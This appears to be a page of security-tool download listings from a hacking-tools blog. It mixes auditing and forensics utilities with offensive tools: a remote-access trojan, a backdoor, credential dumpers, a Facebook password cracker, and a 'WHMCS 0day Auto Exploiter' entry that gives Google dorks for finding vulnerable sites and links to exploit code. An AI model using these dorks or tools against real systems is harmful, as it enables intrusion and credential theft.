[Lynis] Security and system auditing tool to harden Linux systems

Lynis is an auditing tool for Unix/Linux (specialists). It scans the system and available software and performs many individual security checks. It determines the hardening state of the machine and detects security issues. Beside security related information it will also scan for general system information, installed packages and possible configuration errors.

This software aims in assisting automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read only storage is possible (USB stick, cd/dvd).

Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits.

Intended audience:Security specialists, penetration testers, system auditors, system/network managers.Examples of audit tests:- Available authentication methods- Expired SSL certificates- Outdated software- User accounts without password- Incorrect file permissions- Configuration errors- Firewall auditing

Download Lynis

Bozok RAT 1.4.3

Changelog:
-fixed socket timeout bug
-fixed small translation bugs
-added spanish/arabic/bulgarian/polish/french translation
-added "Test Connection" in builder

Download Bozok RAT 1.4.3 

[SterJo Key Finder v.1.6] Tool to recover lost product keys

SterJo Key Finder is a small and FREE application that can recover lost product keys. All you have to do is run the program and it will find the keys for you in a few seconds. The software is currently able to recover a large number of keys like Microsoft Windows, Microsoft Office, WinZip, Corel Draw, CyberLink PowerDVD, Nero, VMWare Workstation, Techsmith Camtasia Studio, AUTOCAD and many more...

After the recovering is done the user could also save the keys into a text file and use them when the reinstallation of the system is required.

Download SterJo Key Finder v.1.6

[Outlook Password Dump] Tool to quickly recover lost email passwords from all versions of Microsoft Outlook

Outlook Password Dump is the free command-line tool to quickly recover lost email passwords from all versions of Microsoft Outlook.

Outlook stores passwords for all the configured mail accounts on your system. These passwords are stored in the encrypted format and only respective user can decrypt it.

Outlook Password Dump tool helps you to instantly decrypt and recover all these stored mail passwords.

Also it can decrypt passwords from different type of Email account configurations supported by Outlook, such as

• IMAP
• POP3
• SMTP
• LDAP
• HTTP

You can choose to dump the passwords to console or write to a file. Being a command line based tool makes it ideal for penetration testers and forensic investigators.

It can recover passwords from all versions of Outlook starting with 'Outlook Express' to latest version, 'Outlook 2013'.

Download Outlook Password Dump v1.0

[Mellivora] Basic database driven CTF engine

Mellivora is a basic database driven CTF engine written in PHP.

Requirements

• LAMP: PHP 5.3+, MySQL 5.5+, Apache 2.2+. May work with other configurations but this is untested.

Installation

• Download to any directory, say: "/var/www/mellivora/".
• Create an Apache VHost and point DocumentRoot to "htdocs/". An example Apache config can be found in the "install/" directory.
• Create a database and import the structure from "install/db.sql".
• Edit "config.inc.php" and "db.inc.php" in "config/".
• Make the "writable/" directory and subdirectories writable by Apache.

Download Mellivora

[Web-Sorrow v1.5] Versatile security scanner for the information disclosure and fingerprinting phases of pentesting

Web-Sorrow is a perl based tool for misconfiguration, version detection, enumeration, and server information scanning. It's entirely focused on Enumeration and collecting Info on the target server. Web-Sorrow is a "safe to run" program, meaning it is not designed to be an exploit or perform any harmful attacks.

Web Services: a CMS and it's version number, Social media widgets and buttons, Hosting provider, CMS plugins, and favicon fingerprints

Authentication areas: logins, admin logins, email webapps

Bruteforce: Subdomains, Files and Directories

Stealth: with -ninja you can gather valuable info on the target with as few as 6 requests, with -shadow you can request pages via google cache instead of from the host

AND MORE: Sensitive files, default files, source disclosure, directory indexing, banner grabbing (see below for full capabilities)

Download Web-Sorrow v1.5

[Wi-Fi Password Key Generator] Wireless WEP/WPA/WPA2 Security Key Maker Tool

WiFi Password Key Generator is the free desktop tool to quickly create secure Wireless WEP/WPA/WPA2 keys.

Most devices (Modems/Routers) require you to enter WEP/WPA keys during Wireless security configuration. Unlike regular passwords, these keys have strict length requirements based on type of security mechanism (WEP, WPA, WPA2 etc).

In such cases, 'Wi-Fi Password Key Generator' can help you to easily generate these keys. It supports all types of Wireless Security configurations (WEP, WPA, WPA2) and key length combinations as shown below,

• WEP - 64-bit - 5 Characters
• WEP - 128-bit - 13 Characters
• WEP - 152-bit - 16 Characters
• WEP - 256-bit - 29 Characters
• WPA - 64-bit - 8 Characters
• WPA2 - 160-bit - 20 Characters
• WPA2 - 504-bit - 63 Characters

It generates Secure Wireless keys using combination of lowercase letters, uppercase letters, numbers and special symbols.

Also the generated key is displayed in both ASCII and HEX format. So based on what your wireless device asks, you can copy the right form of key.

It is very easy to use this tool and any one can generate secure Wi-Fi key within seconds with few clicks.

Download WiFi Password Key Generator v1.5

[SterJo Wireless Passwords v.1.4] Utility for recovering your lost wireless passwords of your network

SterJo Wireless Password is FREE utility for recovering your lost wireless passwords of your network.

As the number of devices using wireless network increases same as the need for more security, it often may happen your password containing letters, numbers and special characters to be forgotten in time. So instead of completely resetting everything and creating a new password there is a much simpler solution.

All you have to do is run SterJo Wireless Passwords and allow it to scan your wireless network. The software will display all saved passwords by Wireless Zero Configuration or WLAN AutoConfig service and can be used to connect your other wireless devices without a fear of forgetting them in the future.

 Download SterJo Wireless Passwords v.1.4

[Doona] Network Protocol Fuzzer

Doona is a fork of the Bruteforce Exploit Detector, it was renamed to avoid confusion as it has a large number of of changes. You should get a copy from github if you want to try it: https://github.com/wireghoul/doona.

It's currently a little short on documentation, so I will let the changelog details some of the many differences between Doona and BED:

[ 0.7 ]

- resolved the need for a hardcoded plugin list

- added max requests option to allow parallel execution (easier than hacking in thread support)

- added sigpipe handler to prevent silent exit if server unexpectedly closes the connection

- added http proxy module

- added more ftp test cases

- added more rtsp test cases

- added more http test cases

- added more irc test cases

- fixed a long standing BED bug where two test strings where accidentally concatenated

- fixed a long standing BED bug where a hex representation of a 32bit integer was not max value as intended

- aliased -m to -s (-s is getting deprecated/reassigned)

- renamed plugins to modules (-m is for module)

- removed directory traversal testing code from ftp module

- rewrote/broke misc testing procedure to test specific edge cases, needs redesign

- added support for multiple setup/prefix/verbs, ie: fuzzing Host headers with GET/POST/HEAD requests

- fixed long standing BED bug in the smtp module where it wouldn't greet the mail server correctly with HELO

- added more smtp test cases

- fixed long standing BED bug in escaped Unicode strings

- added more large integer and formatstring fuzz strings

- fixed column alignment in the progress output

Download Doona

[Binwalk v1.2.2] Firmware Analysis Tool

Binwalk is a firmware analysis tool designed to assist in the analysis, extraction, and reverse engineering of firmware images and other binary blobs. It is simple to use, fully scriptable, and can be easily extended via custom signatures, extraction rules, and plugin modules.

Binwalk supports various types of analysis useful for inspecting and reverse engineering firmware, including:

• Embedded file identification and extraction
• Executable code identification
• Type casting
• Entropy analysis and graphing
• Heuristic data analysis
• "Smart" strings analysis

Binwalk's file signatures are (mostly) compatible with the magic signatures used by the Unix file utility, and include customized/improved signatures for files that are commonly found in firmware images such as compressed/archived files, firmware headers, kernels, bootloaders, filesystems, etc. 

Download Binwalk v1.2.2 

[Facebook Password Decryptor v5.5 ] Facebook Password Recovery Software

Facebook Password Decryptor is the FREE software to instantly recover Facebook account passwords stored by popular Web Browsers and Messengers.

It is one of our most popular software with over One Million Downloads worldwide.

Here is the complete list of supported applications. 

• Internet Explorer (v4.0 - v10.0)
• Firefox
• Google Chrome
• Chrome Canary/SXS
• CoolNovo Browser
• Opera Browser
• Apple Safari
• Flock Browser
• Comodo Dragon Browser
• SeaMonkey Browser
• Paltalk Messenger
• Miranda Messenger

It is very easy to use and particularly more useful for Penetration testers and Forensic investigators.

For command-line version, check out our new tool - Facebook Password Dump.

 Facebook Password Decryptor v5.5

[SterJo Startup Patrol v.1.3] Disable software that delayed the boot time

Often may happen your PC to run a little slower than usual. Don't worry, it is nothing serious. You’ve probably installed some software that delayed the boot time.

SterJo Startup Patrol allows you to view those files and disable them. This way you can optimize the Windows startup time but be careful not to disable some crucial programs you are using. By blocking those unneeded files the system will definitely run faster and smoother.

The software constantly tracks the new or modified startup registry and notifies if some changes appears.

If any application tries to put a startup registry on your system then the software will display the application with the following information: Section, Product Name, Product Description, Company, Version and Process Path.

Using the displayed information the user could disable or delete the unwanted program and prevent it from automatically running.

Download SterJo Startup Patrol v.1.3

[TinySHell] Ported to SCTP

You may have seen, a while ago, my post on SCTP reverse shells.

I realized quite quickly that I should definately do some more research in this direction, and hence ported one of my favourite Unix backdoors (which uses a TCP connection) to use a SCTP connection instead. This backdoor allows for a remote PTY, file upload, and file download. It also is encrypted connection.

The backdoor in question is ‘TinySHell’ by the inestimable Christophe Devine (who left quite a legacy of code, which I may start to maintain as he appears to have vanished. Chris, if you are out there, get in touch or something! Love your work!). I spent a short while examining the code, then quickly patched it up to replace all the TCP stuff with SCTP stuff. I imagine I could easily alter it to do UDP, and might try that later.

Anyways, without further ado, here is the code. Again, all credit to Chris, all I did was modify it!

Download TinySHell

[IPv6 Disable Tool] Command-line Software to Enable or Disable IPv6 on Windows

IPv6 Disable is the free command-line tool to quickly Enable or Disable IPv6 (Internet Protocol version 6) on your Windows system.


It automatically checks for the current status of IPv6 and then enable/disable it accordingly.
It is simple & easy to use tool. Also being a command-line based tool makes it perfect for automation and to use on remote systems.

Download IPv6 Disable v1.5        

WHMCS 0day Auto Exploiter <= 5.2.8

inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:"Powered by WHMCompleteSolution"
intext:"Powered by WHMCompleteSolution" inurl:clientarea.php
inurl:announcements.php intext:"WHMCompleteSolution"
intext:"Powered by WHMCS"


Here is the PHP code that you must save as WHMCS-Fucker.php:

http://pastebin.com/cuikqkhA

https://dl.dropboxusercontent.com/u/2330423/whmcs_0day_auto_exploiter_%3C%3D_5.2.8.txt
https://dl.dropboxusercontent.com/u/2330423/whmcs.py

[Ghiro v0.1] Digital Image Forensic Analyzer

Sometime forensic investigators need to process digital images as evidence. There are some tools around, otherwise it is difficult to deal with forensic analysis with lot of images involved. Images contain tons of information, Ghiro extracts these information from provided images and display them in a nicely formatted report.

Dealing with tons of images is pretty easy, Ghiro is designed to scale to support gigs of images.

All tasks are totally automated, you have just to upload you images and let Ghiro does the work. 

Understandable reports, and great search capabilities allows you to find a needle in a haystack.

Ghiro is a multi user environment, different permissions can be assigned to each user. Cases allow you to group image analysis by topic, you can choose which user allow to see your case with a permission schema.

Ghiro can be used in many scenarios, forensic investigators could use it on daily basis in their analysis lab but also people interested to undercover secrets hidden in images could benefit. Some use case examples are the following:

• If you need to extract all data and metadata hidden in an image in a fully automated way
• If you need to analyze a lot of images and you have not much time to read the report for all them
• If you need to search a bunch of images for some metadata
• If you need to geolocate a bunch of images and see them in a map
• If you have an hash list of “special” images and you want to search for them

Download Ghiro v0.1

[SterJo Task Manager v.2.6] Advanced utility for process managing

SterJo Task Manager is a FREE an advanced utility for process managing which allows you to get details on everything that’s running on your computer.

The program is divided in several sections covering the main parts of each system. “Processes” gives you more details about all processes and also could show the CPU usage of each process with an option to terminate it and retrieve the speed of the computer.

Anyway if the startup of your system is significantly slower than previously known then the reason for that is probably too much applications stored into the boot sequence. "Registry" section can take care of this and exclude all those unnecessary things in order to speed up the startup. This way you can optimize the Windows startup time but be careful not to disable some crucial programs you are using. The "Services" shows Windows and non-Windows services with ability to stop, pause or delete them.

The main thing that distinguishes this software from the standard Windows Task Manager is the section “Connections”. Here you can see all processes that target the internet which could be quite useful for various analyses and increase your safety.

Download SterJo Task Manager v.2.6

[AxCrypt] Open Source Windows File Encryption Software

AxCrypt is the leading open source Windows file encryption software. It integrates seamlessly with Windows to compress, encrypt, decrypt, store, send and work with individual files.

Personal Privacy and Security with AES-128 File Encryption and Compression for Windows 2000/2003/XP/Vista/2008/7. Double-click to automatically decrypt and open documents. Store strong keys on removable USB-devices.

Features

• Password Protect any number of files using strong encryption.
• Right-click integration with Windows Explorer makes AxCrypt the easiest way to encrypt individual files in Windows.
• Double-click integration makes it as easy to open, edit and save protected files as it is to work with unprotected files.
• Many additional features, but no configuration required. Just install it and use it.
• AxCrypt encrypts files that are safely and easily sent to other users via e-mail or any other means. Self-decrypting files are also supported, removing the need to install AxCrypt to decrypt.
• AxCrypt is translated into English, Danish, Dutch, French, German, Hungarian, Italian, Norwegian, Russian, Polish, Spanish and Swedish so chances are it speaks your preferred language.

AxCrypt is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation.

Read more here. 

Download AxCrypt

[FruityWifi v1.0] Wireless network auditing tool

FruityWifi is a wireless network auditing tool based in the wifi Pineapple. The application can be installed in any Debian based system adding the extra packages. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi).

Services

• Wireless: Start|Stop wireless access point. (hostapd)
• Supplicant: Connects to the internet using a wireless interface
• Karma: REF: http://www.digininja.org/karma/
• URL Snarf: Start|Stop urlsnarf
• URL Spoof: Start|Stop urlsnarf
• Kismet: Start|Stop kismet
• Squid: Start|Stop squid3
• sslstrip: Start|Stop sslstrip

Manual >> https://github.com/xtr4nge/FruityWifi/wiki/Manual

Download FruityWifi v1.0

[Router Password Decryptor] Tool to Recover Login/PPPoE/WEP/WPA/WPA2 Passwords from Router/Modem Config file

Router Password Decryptor is the FREE tool to instantly recover internet login/PPPoE authentication passwords, Wireless WEP keys, WPA/WPA2 Passphrases from your Router/Modem configuration file.

Currently it supports password recovery from following type of Routers/Modems

Cisco

Juniper

DLink

BSNL

In addition to this, it also has unique 'Smart Mode' feature (experimental) to recover passwords from any type of Router/Modem configuration file. It detects various password fields from such config file (XML only) and then automatically try to decrypt those passwords.

It also has quick link to Base64 Decoder which is useful in case you have found Base64 encoded password (ending with =) in the config file and automatic recovery is not working.

It is very easy to use tool with its cool GUI interface. Administrators & Penetration Testers will find it more useful to recover login passwords as well as wireless keys from the router configuration files.

Download Router Password Decryptor v1.5 

[SterJo NetStalker v.1.0] Security software able to detect all authorized and unauthorized connections

SterJo NetStalker is innovative and FREE security software able to detect all authorized and unauthorized connections to your computer and send you alert for each new connection.

The software is based on similar principles as most firewalls work and also could create a custom security policies with an advantage to run it totally portable. It serves as an entry point into your computer and instantly informs you about all the processes able to establish a connection with an external network.

If making an analysis of all open ports on your system with a standard port scanner would take a few minutes, with this program it would be done only in a few milliseconds. This is also quite powerful software for making analysis of all running processes on your system as well as those that look suspicious.

The program offers an option to display details about all connections and closing individual connection or entire process.

If you are one of those who want to know exactly where your connections are targeted then this program is the ideal solution for you.

Download SterJo NetStalker v.1.0

Nmap CheatSheet

Download [PDF] Nmap CheatSheet By SANS

[Firebind Reflector v0.53] Portable Network Path Scanning Tool

Firebind Reflector is a portable network path scanning tool that can profile firewall and other network device rules for port blocking, such as perform egresss/exfiltration testing. Reflector has a client side and listener (server-side) like Netcat and Ncat, except Reflector can dynamically be told by the client to listen on any or all 65,535 TCP or UDP ports, while supporting up to several hundred simultaneous client scans.

• All components of Reflector (server-side and client-side) are contained within a single 3 megabyte Java jar file. The Reflector jar file contains the core Firebind codebase, a fully functional web server, and both Reflector Java applet and command line clients.
• Reflector’s Java applet is automatically downloaded to the client machine, requiring no user installation other than allowing it to run within the browser. Since it is browser-based, any user no matter how non-technical they may be can run a test.
• Reflector’s patent pending technology (System and Method for Network Path Validation – US 20130185428) allows Reflector to dynamically listen on any UDP or TCP port, while never exceeding operating system limits that restrict the maximum number of listeners (which can be as low as several hundred at a time out of 65,535 possible ports for either TCP or UDP.)
• Reflector’s out-of-band command channel allows all clients to keep in sync with the Reflector server component regardless of whether the given port under test is blocked or not, giving Reflector 100% accuracy in results. Other client-only solutions can’t guarantee that the packets they receive back are coming from the device they are trying to profile or test. The out-of-band command channel also allows a single instance of Reflector to handle hundreds of simultaneous clients, all performing full 64k TCP and/or UDP port tests. Finally, the out-of-band command channel increases the speed of the tests since the client can be configured to wait any number of seconds for a reply, and if that timer expires, the client can issue a “skip” command to Reflector to tell it to move to the next port.
• Reflector does more than simple TCP handshake connection attempts by sending a custom payload over every port and checking to confirm the payload echoed back from the server matches or not.
• Reflector’s built-in database and RESTful API allow test results to be viewed via a web page or accessed by third-party applications. This removes the burden from the client-side user to e-mail their results.

More information

[WiFi Password Dump] Command-line Tool to Recover Wireless Passwords

WiFi Password Dump is the free command-line tool to quickly recover all the Wireless account passwords stored on your system.

It automatically recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager. For each recovered WiFi account, it displays following information

WiFi Name (SSID) Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP) Password Type Password in Hex format Password in clear text

Being command-line tool makes it useful for penetration testers and forensic investigators. For GUI version check out the Wi-Fi Password Decryptor.

Download WiFi Password Dump v1.0

[Mutator v0.2.2.1] Wordlist mutator

This project aims to be a wordlist mutator with hormones, which means that some
mutations will be applied to the result of the ones that have been already done,
resulting in something like:


corporation -> C0rp0r4t10n_2012

This software is usefull when applied to a few words, like company name and/or
domain name targeted or the usernames of the system administrators. You must
think that the number of wrds resulting of applying all mutations is exponential
: a 1 word input would generate an output of 1200 words; a 4 words input would
generate an output of 4800 words.

The actual mutations supported are:
* Case mutations (toUpper, toLower, FirstCharUpper, SwapCase)
* T0 l33t mutation
* Add Special Char mutation
* Append String of a predefined list
* Append Date

Some mutations are strange, and some of them have no sense applied together,
like *_strings and add_year, but is your decision, for that exists the
parameters xDDD

The mutations "prepend_string" is commented becouse IMHO have no sense xD and
is rare find passwords like this but feel free to uncommented it, and don't
forget uncomment it in mutator.h too

Syntax: mutator [options] wordlist

Options:
-v, --version       Show version information
-h, --help         Show this help
-o, --output [file] File to write the results
-f, --file [file]* File from read the words
-w, --word [word]* Word to mutate
-b, --basic         Only "case" and "l33t" mutations
-a, --advanced     Only advanced mutations
-y, --years=[year] No append,prepend year, if a year is specified appendrange between year specified and actual year, you can specified a range as well [year-year]
-x, --specials     No append specials chars
-s, --strings       No append,prepend hardcoded strings

One of these options -w or -f is required

Use Case:

$ ./mutator -w company -o company.dic

$ for i in $(cat user.dic);do ./mutator -w $i -o $i.dic; done

Download Mutator v0.2.2.1

[Browser Password Decryptor v5.5] Software to instantly recover website login passwords stored by popular web browsers

Browser Password Decryptor is the FREE software to instantly recover website login passwords stored by popular web browsers.

Currently it can recover saved login passwords from following browsers.

Firefox Internet Explorer Google Chrome Google Chrome Canary/SXS CoolNovo Browser Opera Browser Apple Safari Comodo Dragon Browser SeaMonkey Browser Flock Browser

For command-line version, check out our new tool - Browser Password Dump. Features: Instantly decrypt and recover stored encrypted passwords from popular web browsers. Right Click Context Menu to quickly copy the password Recover password of any length and complexity. Automatically discovers all supported Applications and recovers all the stored passwords. Sort feature to arrange the recovered passwords in various order to make it easier to search through 100's of entries. Save the recovered password list to HTML/XML/Text file Easier and faster to use with its enhanced user friendly GUI interface. Support for local Installation and uninstallation of the software.    Download Browser Password Decryptor v5.5

[LinEnum v0.2] Automating local information gathering tasks on Linux hosts

LinEnum is a shell script that automates local information gathering tasks on Linux hosts.Over 65 checks are performed, obtaining anything from kernel information to locating possible escalation points such as potentially useful SUID/GUID files and Sudo/rhost mis-configurations etc.

Additionally, the script will also use a provided keyword to search through *.conf and *.log files. Any matches will be displayed along with the full file path and line number on which the keyword was identified (useful for finding ‘password’ and other sensitive data).

High-level summary of the checks/tasks performed by LinEnum:

• Kernel and distribution release details
• System Information:
  • Hostname
  • Networking details:
  • Current IP
  • Default route details
  • DNS server information
• User Information:
  • Current user details
  • Last logged on users
  • List all users including uid/gid information
  • List root accounts
  • Checks if password hashes are stored in /etc/passwd
  • Extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc
  • Attempt to read restricted files i.e. /etc/shadow
  • List current users history files (i.e .bash_history, .nano_history etc.)
  • Basic SSH checks
• Privileged access:
  • Determine if /etc/sudoers is accessible
  • Determine if the current user has Sudo access without a password
  • Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
  • Is root’s home directory accessible
  • List permissions for /home/
• Environmental:
  • Display current $PATH
• Jobs/Tasks:
  • List all cron jobs
  • Locate all world-writable cron jobs
  • Locate cron jobs owned by other users of the system
• Services:
  • List network connections (TCP & UDP)
  • List running processes
  • Lookup and list process binaries and associated permissions
  • List inetd.conf/xined.conf contents and associated binary file permissions
  • List init.d binary permissions
• Version Information (of the following):
  • Sudo
  • MYSQL
  • Postgres
  • Apache
  • Checks user config
• Default/Weak Credentials:
  • Checks for default/weak Postgres accounts
  • Checks for default/weak MYSQL accounts
• Searches:
  • Locate all SUID/GUID files
  • Locate all world-writable SUID/GUID files
  • Locate all SUID/GUID files owned by root
  • Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)
  • List all world-writable files
  • Find/list all accessible *.plan files and display contents
  • Find/list all accesible *.rhosts files and display contents
  • Show NFS server details
  • Locate *.conf and *.log files containing keyword supplied at script runtime
  • List all *.conf files located in /etc
  • Locate mail

Download LinEnum v0.2

[Dumpper v.30.2] Gestor de redes wireless

Dumpper es un gestor de redes wireless con el que podemos conectarnos a nuestra red, entre otras cosas.

Abrimos el programa, le damos a "Escanear" y saldran en pantalla las redes disponibles, seleccionamos la nuestra e introducimos la clave en la casilla "Key", luego le damos a "Conectar" y listo.

Tambien he puesto una funcion que muestra las claves por defecto de las redes WLAN_XXXX y JAZZTEL_XX con macs compatibles.

También he incluido un gestor de perfiles con el que podemos añadir, eliminar o conectar a los pefiles que queramos. Seleccionamos la red y le damos al boton "Añadir a perfiles". Se abrira automaticamente la pestaña "Perfiles" donde podemos ver los detalles de los perfil creados, los parametros locales de la conexion de red, la calidad del enlace, etc. He incluido una opcion por si se quiere meter la clave en Ascii en vez de en hexadecimal, hay que marcar la casilla que hay al lado de "Key" si es el caso.

Y bueno, los botones de Guardar, Eliminar y Activar esta bastante claro para que son, no creo que haga falta explicarlo..

--------------------------------------------------------------------

Añadida una nueva pestaña llamada "Tools" que incluye un apartado para hacer ping a la ip o al host especificado, otro apartado para escanear los puertos que tenemos abiertos y otro el apartado es un escaner de ips.

Más Información y Descarga de Dumpper v.30.2

[Sandy v0.1] Open-source Samsung phone encryption assessment framework

Sandy is an open-source Samsung phone encryption assessment framework. Sandy has different modules that allow you to carry out different attack scenarios against encrypted Samsung phones. For the details check our Derbycon 3.0 presentation (What’s common in Oracle and Samsung? They tried to think differently about crypto).

Requirements

• It was developed with python 2.7.
• Most of the modules works on OSX.
• Every modules should work on Kali Linux.
• You need pexpect, pbkdf2 and pyCrypto pyhton modules.

Download Sandy v0.1

[Smbexec v2.0] A rapid tool based on psexec style attack with samba tools

A rapid tool based on psexec style attack with samba tools.

Key features

• Enumerate systems with domain admin logged in
• Grab hashes
• Extract cached creds (based on cachedump)
• Remote Login Validation
• Dump cleartext credentials
• Pop shells

Includes

• smbexec.sh
• installer.sh
• patches to compile binaries
• source for samba-3.6.9 and winexe-1.00

Credit where credit is due:

• wce.exe – Hernan Ochoa – An incredible tool that mimikatz CANNOT touch! – http://www.ampliasecurity.com
• smbclient & winexe Hash Passing patch – JoMo-kun -> http://www.foofus.net/~jmk/passhash.html – Patch updated for Samba 3.6.12 by exfil (Emilio Escobar)
• vanish.sh – Original concept Astr0baby stable version edits Vanish3r -> http://www.securitylabs.in/2011/12/easy-bypass-av-and-firewall.html
• www.samba.org
• winexe – ahajda -> http://sourceforge.net/users/ahajda
• Metasploit – www.metasploit.com (Thank you HD and team!)
• Nmap – nmap.org (Thank you Fydor!)
• Creddump – Brendan Dolan-Gavitt – http://code.google.com/p/creddump/
• NTDSXtract – Csaba Barta – http://www.ntdsxtract.com/
• libesedb – Joachim Metz – http://libesedb.googlecode.com/

Download Smbexec v2.0

[WFacebook] Facebook Password Cracker

Facebook Password Cracker.

Video:

Download WFacebook

[PoshSec Framework v0.2] Graphical Interface for Powershell scripts

The PoshSec Framework is a tool that is designed to provide a graphical interface for powershell scripts, functions, modules, and cmdlets.

It allows the community to write scripts that can interact with the interface by providing alerts, and output directly from their powershell scripts. This framework can be used for offensive, defensive, or simply system administrative tasks.

The PoshSec Framework is not merely a defense tool. It can be used for offense, defense, and even system administration. The whole idea is to give people a tool for powershell that isn’t just a command line. The roadmap is to add graphs, a dashboard, scheduling, reporting, etc. This is a very active project and I encourage you to download it and see what it can do for you. The sky is the limit. This project is not the sum of it’s code. It’s the sum of what the community wants to invest into it.

PoshSec video

Read more here about PoshSec

Download PoshSec Framework v0.2

[jSQL Injection v0.5] Java tool for automatic database injection

jSQL Injection is a lightweight application used to find database information from a distant server.

jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

jSQL Injection change log - version 0.5

0.5

• SQL shell
• Uploader

0.4

• Admin page checker and preview
• Brute forcer (md5 mysql...)
• Coder (encode decode base64 hex md5...)

0.3

• Distant file reading
• Webshell deposit
• Terminal for webshell commands
• Configuration backup
• Update checker

0.2

• Time based algorithm
• Multi-thread control (start/pause/resume/stop)
• Shows URL calls

0.0 and 0.1

• GET, POST, header, cookie methods
• Normal, error based, blind algorithms
• Automatic best algorithm selection
• Progression bars
• Simple evasion
• Proxy setting
• Supports MySQL 

Download jSQL Injection v0.5

[Matriux Leandros v3.0 rc1] The pentesting distrib (Now added Blackhat Arsenal 2013 Tools)

Matriux is a Debian-based security distribution designed for penetration testing and forensic investigations. Although it is primarily designed for security enthusiasts and professionals, it can also be used by any Linux user as a desktop system for day-to-day computing. Besides standard Debian software, Matriux also ships with an optimised GNOME desktop interface, over 340 open-source tools for penetration testing, and a custom-built Linux kernel.

Matriux was first released in 2009 under code name “lithium” and then followed by versions like “xenon” based on Ubuntu. Matriux “Krypton” then followed in 2011 where we moved our system to Debian. Other versions followed for Matriux “Krypton” with v1.2 and then Ec-Centric in 2012. This year we are releasing Matriux “Leandros” RC1 on 2013-09-27 which is a major revamp over the existing system.

Matriux arsenal is divided into sections with a broader classification of tools for Reconnaissance, Scanning, Attack Tools, Frameworks, Radio (Wireless), Digital Forensics, Debuggers, Tracers, Fuzzers and other miscellaneous tool providing a wider approach over the steps followed for a complete penetration testing and forensic scenario. Although there are were many questions raised regarding why there is a need for another security distribution while there is already one. We believed and followed the free spirit of Linux in making one. We always tried to stay updated with the tool and hardware support and so include the latest tools and compile a custom kernel to stay abreast with the latest technologies in the field of information security. This version includes a latest section of tools PCI-DSS.

Matriux is also designed to run from a live environment like a CD/ DVD or USB stick which can be helpful in computer forensics and data recovery for forensic analysis, investigations and retrievals not only from Physical Hard drives but also from Solid state drives and NAND flashes used in smart phones like Android and iPhone. With Matriux Leandros we also support and work with the projects and tools that have been discontinued over time and also keep track with the latest tools and applications that have been developed and presented in the recent conferences.

Features (notable updates compared to Ec-Centric):

• Custom kernel 3.9.4 (patched with aufs, squashfs and xz filesystem mode, includes support for wide range of wireless drivers and hardware) Includes support for alfacard 0036NH

• USB persistent

• Easy integration with virtualbox and vmware player even in Live mode.

• MID has been updated to make it easy to install check http://www.youtube.com/watch?v=kWF4qRm37DI

• Includes latest tools introduced at Blackhat 2013 and Defcon 2013, Updated build until September 22 2013.

• UI inspired from Greek Mythology

• New Section Added PCI-DSS

• IPv6 tools included.

Download Matriux Leandros v3.0 rc1

[Kvasir] Tools for effective data management during a Penetration Test

Welcome to Kvasir! Herein these directories lay the groundwork tools for effective data management during a Penetration Test.

Penetration tests can be data management nightmares because of the large amounts of information that is generally obtained. Vulnerability scanners return lots of actual and potential vulnerabilitites to review. Port scanners can return thousands of ports for just a few hosts. How easy is it to share all this data with your co-workers?

That's what Kvasir is here to help you with. Here's what you'll need to get started:

•     The latest version of web2py (http://www.web2py.com/)
•     A database (PostgreSQL known to work)
•     A network vulnerability scanner (Nexpose/Nmap supported)
•     Additional python libraries

Kvasir is a web2py application and can be installed for each customer or task. This design keeps data separated and from you accidentally attacking or reviewing other customers.

This tool was developed primarily for the Cisco Systems Advanced Services Security Posture Assessment (SPA) team. While not every method used by the SPA team may directly relate we hope that this tool is something that can be molded and adapted to fit almost any working scenario.

Download Kvasir

[Hook Analyser v2.6] Application (and Malware) Analysis tool

Application (and Malware) Analysis tool. Hook Analyser is a hook tool which could be potentially helpful in reversing application and analysing malwares.

Changelog v2.6

• Added new signatures (and removed redundant ones)
• Bug fixes – Many thanks for community users to reporting them.
• Fixed start-up error.

More Information:

• http://hookanalyser.blogspot.com

Download Hook Analyser v2.6